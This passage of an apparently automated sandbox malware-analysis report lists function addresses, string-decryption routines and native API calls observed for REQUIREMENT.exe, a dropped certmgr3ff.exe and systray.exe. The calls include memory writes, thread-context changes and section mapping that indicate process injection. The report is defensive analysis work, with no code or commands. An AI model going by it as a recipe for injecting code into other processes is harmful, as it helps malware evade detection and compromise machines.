Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965E1	24_2_022965E1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BF5	24_2_02296BF5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965C9	24_2_022965C9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022973C1	24_2_022973C1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BC5	24_2_02296BC5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BDD	24_2_02296BDD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BD1	24_2_02296BD1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965D5	24_2_022965D5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C2045	25_2_022C2045
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C76AD	25_2_022C76AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CBBCC	25_2_022CBBCC
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6029	25_2_022C6029
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6829	25_2_022C6829
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5E2B	25_2_022C5E2B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6035	25_2_022C6035
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6835	25_2_022C6835
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C7A08	25_2_022C7A08
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6805	25_2_022C6805
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C681D	25_2_022C681D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C646D	25_2_022C646D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6269	25_2_022C6269
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A69	25_2_022C6A69
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6065	25_2_022C6065
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6479	25_2_022C6479
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A75	25_2_022C6A75
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6071	25_2_022C6071
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C684C	25_2_022C684C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6041	25_2_022C6041
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6841	25_2_022C6841
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CA25C	25_2_022CA25C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C625D	25_2_022C625D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A5D	25_2_022C6A5D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6059	25_2_022C6059
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C9A51	25_2_022C9A51
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6251	25_2_022C6251
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C58A9	25_2_022C58A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C64A9	25_2_022C64A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6AA5	25_2_022C6AA5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CA8BF	25_2_022CA8BF
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C628D	25_2_022C628D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A8D	25_2_022C6A8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6485	25_2_022C6485
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6281	25_2_022C6281
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C649D	25_2_022C649D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A99	25_2_022C6A99
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6491	25_2_022C6491
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5A93	25_2_022C5A93
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5EE5	25_2_022C5EE5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5EFD	25_2_022C5EFD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CAAF9	25_2_022CAAF9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5ECD	25_2_022C5ECD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5EC3	25_2_022C5EC3
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5ED9	25_2_022C5ED9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6929	25_2_022C6929
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C613D	25_2_022C613D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C673B	25_2_022C673B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6935	25_2_022C6935
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5F15	25_2_022C5F15
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5F11	25_2_022C5F11
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C616D	25_2_022C616D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6769	25_2_022C6769
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6365	25_2_022C6365
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C637D	25_2_022C637D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6179	25_2_022C6179
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C694D	25_2_022C694D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6745	25_2_022C6745
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6941	25_2_022C6941
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C675D	25_2_022C675D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6959	25_2_022C6959
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C635B	25_2_022C635B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6155	25_2_022C6155
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6751	25_2_022C6751
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65BD	25_2_022C65BD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C65B1	25_2_022C65B1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C9D8D	25_2_022C9D8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6389	25_2_022C6389
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6185	25_2_022C6185

Found potential string decryption / allocating functions

Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9D7C40 appears 52 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9D5050 appears 36 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1EA1EF10 appears 105 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9924D0 appears 38 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9FE692 appears 172 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9E7BE4 appears 96 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E97B910 appears 502 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1EA0EF10 appears 210 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9D7BE4 appears 192 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E9C5050 appears 72 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1E98B910 appears 251 times
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: String function: 1EA0E692 appears 86 times
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: String function: 1E9D5050 appears 37 times
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: String function: 1EA1EF10 appears 105 times
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: String function: 1E9E7BE4 appears 99 times
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: String function: 1E98B910 appears 255 times
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: String function: 1EA0E692 appears 86 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04A1EF10 appears 105 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 049D5050 appears 37 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 0498B910 appears 257 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 04A0E692 appears 83 times
Source: C:\Windows\SysWOW64\systray.exe	Code function: String function: 049E7BE4 appears 98 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B76AD NtAllocateVirtualMemory,	1_2_023B76AD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BB688 NtProtectVirtualMemory,	1_2_023BB688
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6035 NtWriteVirtualMemory,	1_2_023B6035
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6835 NtWriteVirtualMemory,	1_2_023B6835
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6029 NtWriteVirtualMemory,	1_2_023B6029
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6829 NtWriteVirtualMemory,	1_2_023B6829
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B681D NtWriteVirtualMemory,	1_2_023B681D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6805 NtWriteVirtualMemory,	1_2_023B6805
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6479 NtWriteVirtualMemory,	1_2_023B6479
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6071 NtWriteVirtualMemory,	1_2_023B6071
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A75 NtWriteVirtualMemory,	1_2_023B6A75
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6269 NtWriteVirtualMemory,	1_2_023B6269
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A69 NtWriteVirtualMemory,	1_2_023B6A69
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B646D NtWriteVirtualMemory,	1_2_023B646D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6065 NtWriteVirtualMemory,	1_2_023B6065
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6059 NtWriteVirtualMemory,	1_2_023B6059
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B625D NtWriteVirtualMemory,	1_2_023B625D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A5D NtWriteVirtualMemory,	1_2_023B6A5D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023BA25C NtWriteVirtualMemory,LoadLibraryA,	1_2_023BA25C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6251 NtWriteVirtualMemory,	1_2_023B6251
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B684C NtWriteVirtualMemory,	1_2_023B684C
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6041 NtWriteVirtualMemory,	1_2_023B6041
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6841 NtWriteVirtualMemory,	1_2_023B6841
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B58A9 NtWriteVirtualMemory,	1_2_023B58A9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B64A9 NtWriteVirtualMemory,	1_2_023B64A9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6AA5 NtWriteVirtualMemory,	1_2_023B6AA5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A99 NtWriteVirtualMemory,	1_2_023B6A99
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B649D NtWriteVirtualMemory,	1_2_023B649D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6491 NtWriteVirtualMemory,	1_2_023B6491
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B628D NtWriteVirtualMemory,	1_2_023B628D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6A8D NtWriteVirtualMemory,	1_2_023B6A8D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6281 NtWriteVirtualMemory,	1_2_023B6281
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6485 NtWriteVirtualMemory,	1_2_023B6485
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5EFD NtWriteVirtualMemory,	1_2_023B5EFD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6CE1 NtWriteVirtualMemory,	1_2_023B6CE1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5EE5 NtWriteVirtualMemory,	1_2_023B5EE5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5ED9 NtWriteVirtualMemory,	1_2_023B5ED9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5ECD NtWriteVirtualMemory,	1_2_023B5ECD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5EC3 NtWriteVirtualMemory,	1_2_023B5EC3
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B673B NtWriteVirtualMemory,	1_2_023B673B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B613D NtWriteVirtualMemory,	1_2_023B613D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6935 NtWriteVirtualMemory,	1_2_023B6935
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6929 NtWriteVirtualMemory,	1_2_023B6929
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5F11 NtWriteVirtualMemory,	1_2_023B5F11
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B5F15 NtWriteVirtualMemory,	1_2_023B5F15
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6179 NtWriteVirtualMemory,	1_2_023B6179
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B637D NtWriteVirtualMemory,	1_2_023B637D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6769 NtWriteVirtualMemory,	1_2_023B6769
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B616D NtWriteVirtualMemory,	1_2_023B616D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6365 NtWriteVirtualMemory,	1_2_023B6365
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B635B NtWriteVirtualMemory,	1_2_023B635B
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6959 NtWriteVirtualMemory,	1_2_023B6959
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B675D NtWriteVirtualMemory,	1_2_023B675D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6751 NtWriteVirtualMemory,	1_2_023B6751
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6155 NtWriteVirtualMemory,	1_2_023B6155
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B694D NtWriteVirtualMemory,	1_2_023B694D
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6941 NtWriteVirtualMemory,	1_2_023B6941
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6745 NtWriteVirtualMemory,	1_2_023B6745
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65BD NtWriteVirtualMemory,	1_2_023B65BD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65B1 NtWriteVirtualMemory,	1_2_023B65B1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6395 NtWriteVirtualMemory,	1_2_023B6395
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6389 NtWriteVirtualMemory,	1_2_023B6389
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6185 NtWriteVirtualMemory,	1_2_023B6185
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BF5 NtWriteVirtualMemory,	1_2_023B6BF5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65E1 NtWriteVirtualMemory,	1_2_023B65E1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BDD NtWriteVirtualMemory,	1_2_023B6BDD
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BD1 NtWriteVirtualMemory,	1_2_023B6BD1
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65D5 NtWriteVirtualMemory,	1_2_023B65D5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B65C9 NtWriteVirtualMemory,	1_2_023B65C9
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 1_2_023B6BC5 NtWriteVirtualMemory,	1_2_023B6BC5
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D34E0 NtCreateMutant,LdrInitializeThunk,	3_2_1E9D34E0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2EB0 NtProtectVirtualMemory,LdrInitializeThunk,	3_2_1E9D2EB0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2ED0 NtResumeThread,LdrInitializeThunk,	3_2_1E9D2ED0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2E50 NtCreateSection,LdrInitializeThunk,	3_2_1E9D2E50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2F00 NtCreateFile,LdrInitializeThunk,	3_2_1E9D2F00
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2CF0 NtDelayExecution,LdrInitializeThunk,	3_2_1E9D2CF0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2C30 NtMapViewOfSection,LdrInitializeThunk,	3_2_1E9D2C30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2C50 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_1E9D2C50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2DA0 NtReadVirtualMemory,LdrInitializeThunk,	3_2_1E9D2DA0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	3_2_1E9D2DC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2D10 NtQuerySystemInformation,LdrInitializeThunk,	3_2_1E9D2D10
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2B90 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_1E9D2B90
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2BC0 NtQueryInformationToken,LdrInitializeThunk,	3_2_1E9D2BC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_1E9D2B10
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D29F0 NtReadFile,LdrInitializeThunk,	3_2_1E9D29F0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D3C90 NtOpenThread,	3_2_1E9D3C90
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D3C30 NtOpenProcessToken,	3_2_1E9D3C30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D38D0 NtGetContextThread,	3_2_1E9D38D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2E80 NtCreateProcessEx,	3_2_1E9D2E80
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2EC0 NtQuerySection,	3_2_1E9D2EC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2E00 NtQueueApcThread,	3_2_1E9D2E00
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2FB0 NtSetValueKey,	3_2_1E9D2FB0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2F30 NtOpenDirectoryObject,	3_2_1E9D2F30
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2CD0 NtEnumerateKey,	3_2_1E9D2CD0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2C10 NtOpenProcess,	3_2_1E9D2C10
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2C20 NtSetInformationFile,	3_2_1E9D2C20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2D50 NtWriteVirtualMemory,	3_2_1E9D2D50
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2A80 NtClose,	3_2_1E9D2A80
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2AA0 NtQueryInformationFile,	3_2_1E9D2AA0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2AC0 NtEnumerateValueKey,	3_2_1E9D2AC0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2A10 NtWriteFile,	3_2_1E9D2A10
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2B80 NtCreateKey,	3_2_1E9D2B80
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2BE0 NtQueryVirtualMemory,	3_2_1E9D2BE0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2B00 NtQueryValueKey,	3_2_1E9D2B00
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D2B20 NtQueryInformationProcess,	3_2_1E9D2B20
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D29D0 NtWaitForSingleObject,	3_2_1E9D29D0
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D4570 NtSuspendThread,	3_2_1E9D4570
Source: C:\Users\user\Desktop\REQUIREMENT.exe	Code function: 3_2_1E9D4260 NtSetContextThread,	3_2_1E9D4260
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2CF0 NtDelayExecution,LdrInitializeThunk,	13_2_049D2CF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2C30 NtMapViewOfSection,LdrInitializeThunk,	13_2_049D2C30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	13_2_049D2DC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2D10 NtQuerySystemInformation,LdrInitializeThunk,	13_2_049D2D10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2E50 NtCreateSection,LdrInitializeThunk,	13_2_049D2E50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2FB0 NtSetValueKey,LdrInitializeThunk,	13_2_049D2FB0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2F00 NtCreateFile,LdrInitializeThunk,	13_2_049D2F00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D29F0 NtReadFile,LdrInitializeThunk,	13_2_049D29F0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2A80 NtClose,LdrInitializeThunk,	13_2_049D2A80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2AC0 NtEnumerateValueKey,LdrInitializeThunk,	13_2_049D2AC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2B90 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_049D2B90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2B80 NtCreateKey,LdrInitializeThunk,	13_2_049D2B80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2BC0 NtQueryInformationToken,LdrInitializeThunk,	13_2_049D2BC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_049D2B10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2B00 NtQueryValueKey,LdrInitializeThunk,	13_2_049D2B00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D34E0 NtCreateMutant,LdrInitializeThunk,	13_2_049D34E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D4570 NtSuspendThread,	13_2_049D4570
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D4260 NtSetContextThread,	13_2_049D4260
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2CD0 NtEnumerateKey,	13_2_049D2CD0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2C10 NtOpenProcess,	13_2_049D2C10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2C20 NtSetInformationFile,	13_2_049D2C20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2C50 NtUnmapViewOfSection,	13_2_049D2C50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2DA0 NtReadVirtualMemory,	13_2_049D2DA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2D50 NtWriteVirtualMemory,	13_2_049D2D50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2E80 NtCreateProcessEx,	13_2_049D2E80
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2EB0 NtProtectVirtualMemory,	13_2_049D2EB0
